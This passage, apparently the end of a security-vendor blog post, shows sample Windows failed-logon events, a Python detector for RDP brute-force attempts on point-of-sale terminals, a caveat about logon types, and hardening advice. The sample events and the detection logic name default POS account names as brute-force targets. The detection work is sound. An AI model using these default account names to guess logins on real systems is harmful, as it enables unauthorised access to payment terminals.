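2014-03-13T10:00:02 EventID=4625 LogonType=10 TargetUser=pos1 SourceIP=198.51.100.7
2014-03-13T10:00:02 EventID=4625 LogonType=10 TargetUser=shop SourceIP=198.51.100.7
2014-03-13T10:00:03 EventID=4625 LogonType=10 TargetUser=station SourceIP=198.51.100.7
2014-03-13T10:00:04 EventID=4625 LogonType=10 TargetUser=hotel SourceIP=198.51.100.7
2014-03-13T10:00:05 EventID=4625 LogonType=10 TargetUser=atm SourceIP=198.51.100.7
2014-03-13T10:00:20 EventID=4625 LogonType=2 TargetUser=jsmith SourceIP=-
2014-03-13T10:05:00 EventID=4625 LogonType=10 TargetUser=jsmith SourceIP=203.0.113.9
2014-03-13T10:06:00 EventID=4624 LogonType=10 TargetUser=jsmith SourceIP=203.0.113.9
2014-03-13T11:00:00 EventID=4625 LogonType=10 TargetUser=micros SourceIP=203.0.113.44
"""


def parse_event(line):
    """Parse one constructed event line into a dict with a datetime 'ts'."""
    ts_text, *fields = line.split()
    event = {"ts": datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%S")}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def detect_rdp_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return (brute_force_sources, default_account_hits).

    brute_force_sources: dict source_ip -> number of failed RDP logons seen
    within one `window` at the moment the threshold was first reached.
    default_account_hits: list of (source_ip, username) for RDP failures that
    targeted a default POS account name.
    """
    recent = defaultdict(deque)   # source_ip -> timestamps of recent failures
    flagged = {}
    default_hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev.get("EventID") != "4625" or ev.get("LogonType") != "10":
            continue   # only failed RemoteInteractive (RDP) logons
        src = ev.get("SourceIP", "-")
        if src == "-":
            continue   # no network source recorded; nothing to attribute
        if ev.get("TargetUser", "").lower() in DEFAULT_POS_ACCOUNTS:
            default_hits.append((src, ev["TargetUser"]))
        q = recent[src]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:
            q.popleft()   # drop failures that fell out of the window
        if len(q) >= threshold and src not in flagged:
            flagged[src] = len(q)
    return flagged, default_hits


if __name__ == "__main__":
    sources, hits = detect_rdp_bruteforce(SAMPLE_EVENTS)
    for ip, count in sources.items():
        print(f"possible RDP brute force from {ip}: {count} failures within a minute")
    for ip, user in hits:
        print(f"default POS account '{user}' targeted from {ip}")
```

One caveat for anyone turning this into a production rule: when Network Level Authentication is enabled, failed RDP attempts are frequently logged with logon type 3 rather than 10, so the filter should accept both; and an attacker that rotates source addresses will stay under a per-source threshold, which is why the default-account check is kept as an independent signal.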


If you want to try it yourself you can download our Open Source SIEM, OSSIM, or the free 30-day trial of AlienVault Unified Security Management (USM).

We have shown how these threats can impact companies using Point of Sale terminals, especially those retailers and small and medium businesses that don't have visibility into the systems that are part of their networks and handle credit card information.

Some recommendations to protect against these kinds of attacks are:

- Change default credentials of POS systems

- Configure an access control list

- Keep your software up-to-date

- Install an Antivirus solution

- Centralize and monitor the logs from your POS systems to detect potential security breaches
